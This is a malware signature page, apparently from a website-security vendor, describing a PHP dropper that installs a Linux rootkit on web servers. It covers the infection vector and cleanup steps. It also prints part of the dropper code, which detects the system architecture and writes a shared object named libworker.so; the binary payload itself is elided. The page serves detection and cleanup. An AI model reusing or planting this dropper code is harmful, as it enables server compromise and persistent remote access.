Malware Signatures

  1. Home
  2. Malware Signatures
  3. php.dropper.linux-rootkit.001

php.dropper.linux-rootkit.001

Droppers are specially crafted PHP scripts which payload is to download (drop) a second malicious file and execute it. The dropped file can be a backdoor, hacktool, defacement or spam-seo related malware.
This PHP code execute several system commands to download and run a Linux rootkit. This rootkit is a malicious program that allows the attacker to maintain remote access to the server and execute remote commands.

Affecting

Any vulnerable website. Outdated software or compromised passwords can act as an infection vector.

Cleanup

Cleanup is done by deleting the malicious code inside the file or replacing it with a fresh version. The infection can be found in your system by searching for parts of the dump below inside your site's files and also checking for unknown daemonised perl process.
You can also sign up with us and let our team remove the malware for you.

Dump


<?php

header("Content-type: text/plain");

if (! function_exists('file_put_contents')) {
function file_put_contents($filename, $data) {
$f = @fopen($filename, 'w');
if (! $f)
return false;
$bytes = fwrite($f, $data);
fclose($f);
return $bytes;
}
}

$so32 = "......."
$arch = 64;
if (intval("9223372036854775807") == 2147483647)
$arch = 32;
print "Arch is ".$arch."n";
$so = $arch == 32 ? $so32 : $so64;
$f = fopen("/usr/bin/host", "rb");
if ($f) {
$n = unpack("C*", fread($f, 8));
$so[7] = sprintf("%c", $n[8]);
print "System is ".($n[8] == 9 ? "FreeBSD" : "Linux")."n";
fclose($f);
}
print "SO dumped ".file_put_contents("./libworker.so", $so)."n";
if (getenv("MAYHEM_DEBUG"))
exit(0);